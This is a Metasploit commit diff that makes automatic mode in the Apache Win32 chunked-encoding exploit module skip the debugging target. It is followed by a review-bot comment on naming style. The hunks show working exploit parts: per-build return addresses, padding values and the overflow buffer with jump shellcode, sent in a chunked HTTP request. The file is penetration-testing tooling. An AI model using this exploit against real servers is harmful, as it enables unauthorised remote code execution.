Skip the debugging target for automatic mode
git-svn-id: file:///home/svn/framework3/trunk@8499 4d416f70-5f16-0410-b530-b9f4589650da
parent
5d7139ad6f
commit
32357b1f64
|
@ -3,7 +3,7 @@
|
|||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
|
@ -19,7 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Apache Win32 Chunked Encoding',
|
||||
'Description' => %q{
|
||||
This module exploits the chunked transfer integer wrap
|
||||
|
@ -55,24 +55,24 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44",
|
||||
|
||||
},
|
||||
'Targets' =>
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Windows Generic Bruteforce', {} ],
|
||||
|
||||
# Official Apache.org win32 builds
|
||||
[ 'Apache.org Build 1.3.9->1.3.19',
|
||||
[ 'Apache.org Build 1.3.9->1.3.19',
|
||||
{
|
||||
'Ret' => 0x00401151,
|
||||
'Ret' => 0x00401151,
|
||||
'Pad' => [6,2,0,4,1,3,5,7]
|
||||
}
|
||||
],
|
||||
[ 'Apache.org Build 1.3.22->1.3.24',
|
||||
[ 'Apache.org Build 1.3.22->1.3.24',
|
||||
{
|
||||
'Ret' => 0x00401141,
|
||||
'Ret' => 0x00401141,
|
||||
'Pad' => [2,6,0,4,1,3,5,7]
|
||||
}
|
||||
],
|
||||
[ 'Apache.org Build 1.3.19->1.3.24',
|
||||
[ 'Apache.org Build 1.3.19->1.3.24',
|
||||
{
|
||||
'Ret' => 0x6ff6548d,
|
||||
'Pad' => [2,6,0,4,1,3,5,7]
|
||||
|
@ -109,7 +109,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
}
|
||||
],
|
||||
|
||||
# Pop/Pop/Return on Windows 2000
|
||||
# Pop/Pop/Return on Windows 2000
|
||||
[ 'Windows 2000 English',
|
||||
{
|
||||
'Ret' => 0x75022ac4,
|
||||
|
@ -165,7 +165,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
if response.nil?
|
||||
print_status("No response to request")
|
||||
return Exploit::CheckCode::Safe
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
code = Exploit::CheckCode::Appears
|
||||
|
@ -198,6 +198,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
if target_index == 0
|
||||
targets.each_with_index { |targ, idx|
|
||||
next if idx == 0
|
||||
next if targ.name =~ /Debug/
|
||||
|
||||
exploit_target(targ)
|
||||
}
|
||||
|
@ -208,9 +209,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def exploit_target(target)
|
||||
target['Pad'].each { |pad|
|
||||
pattern =
|
||||
rand_text_alphanumeric(3936) +
|
||||
payload.encoded +
|
||||
pattern =
|
||||
rand_text_alphanumeric(3936) +
|
||||
payload.encoded +
|
||||
make_nops(6) + "\xe9" + [-900].pack('V') + "pP" +
|
||||
rand_text_alphanumeric(pad)
|
||||
|
||||
|
@ -237,13 +238,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# v | v | v v | | v v | | v v |
|
||||
# [shellcode] [jmp -949] [pad] [jmp -16] [ret] [jmp -8] [ret] [jmp -8] [ret]
|
||||
#
|
||||
|
||||
|
||||
print_status("Trying #{target.name} [ #{"0x%.8x" % target.ret}/#{pad} ]")
|
||||
|
||||
# Build the request
|
||||
send_request_raw({
|
||||
'uri' => '/',
|
||||
'headers' =>
|
||||
'headers' =>
|
||||
{
|
||||
'Transfer-Encoding' => "CHUNKED"
|
||||
},
|
||||
|
@ -256,3 +257,4 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
end
|
||||
|
||||
|
|
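Review bot: The new `next if targ.name =~ /Debug/` in the `target_index == 0` loop decides behaviour from a target's display name and has no comment saying why. The match is case-sensitive and unanchored, so renaming the debugging target (its definition is outside the visible hunks) or adding another target whose name contains "Debug" would silently change which entries automatic mode iterates over. A one-line comment above it would make the intent reviewable, e.g. `# Automatic mode: skip the debugging target, which is matched by name`. A per-target flag in the options hash, tested here instead of the name, would be sturdier than the regex. The enclosing method starts and ends outside this hunk.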